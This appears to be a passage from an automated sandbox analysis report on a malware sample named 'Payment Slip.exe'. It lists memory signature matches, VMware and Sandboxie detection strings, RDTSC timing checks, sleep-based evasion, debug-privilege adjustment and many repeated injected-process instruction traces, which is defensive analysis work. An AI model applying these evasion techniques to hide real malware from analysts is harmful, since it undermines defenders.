            Source: Yara matchFile source: 00000000.00000002.708947520.000000000268B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Payment Slip.exe PID: 4768, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Payment Slip.exe, 00000000.00000002.708859665.0000000002601000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: Payment Slip.exe, 00000000.00000002.708859665.0000000002601000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\Payment Slip.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Payment Slip.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000001108604 second address: 000000000110860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000110898E second address: 0000000001108994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Payment Slip.exe TID: 4576Thread sleep time: -42483s >= -30000s
            Source: C:\Users\user\Desktop\Payment Slip.exe TID: 6776Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_004088C0 rdtsc
            Source: C:\Users\user\Desktop\Payment Slip.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Payment Slip.exeThread delayed: delay time: 42483
            Source: C:\Users\user\Desktop\Payment Slip.exeThread delayed: delay time: 922337203685477
            Source: Payment Slip.exe, 00000000.00000002.708859665.0000000002601000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000006.00000000.754516320.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Payment Slip.exe, 00000000.00000002.708859665.0000000002601000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000006.00000000.729004409.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.754516320.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.733203652.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
            Source: explorer.exe, 00000006.00000000.747880132.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000006.00000000.733203652.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: Payment Slip.exe, 00000000.00000002.708859665.0000000002601000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: explorer.exe, 00000006.00000000.747880132.0000000004710000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
            Source: explorer.exe, 00000006.00000000.718875548.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: Payment Slip.exe, 00000000.00000002.708859665.0000000002601000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 5_2_004088C0 rdtsc
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Payment Slip.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05149100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05149100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05149100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05218D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05153D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05153D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05153D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05153D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05153D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05153D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05153D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05153D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05153D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05153D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05153D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05153D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05153D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051CA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05174D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05174D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05174D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05164120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05164120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05164120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05164120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05164120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05167D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0516B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0516B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05183D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0516C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0516C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05172990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0516C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05172581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05172581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05172581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05172581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05142D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05142D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05142D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05142D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05142D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05171DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05171DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05171DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051735A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051F8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051D41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05201C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0521740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0521740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0521740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05214015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05214015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05160050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05160050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051DC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051DC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05202073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05211074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0516746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05149080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051890AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051DB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_052014FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05218CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0516F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051DFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051DFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0521070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0521070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05144F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05144F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0520131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05218F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05173B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05173B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0515FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05218B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05172397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05158794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05215BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05151B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05151B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051FD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0520138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05174BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05174BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05174BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051C53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051837F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05163A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0517A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05178E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05158A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051FFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0514E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05218A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_051D4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05149240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05149240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05149240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05149240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05157E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05157E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05157E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05157E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05157E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_05157E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0518927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0516AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0516AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0516AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0516AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0516AE73 mov eax, dword ptr fs:[00000030h]
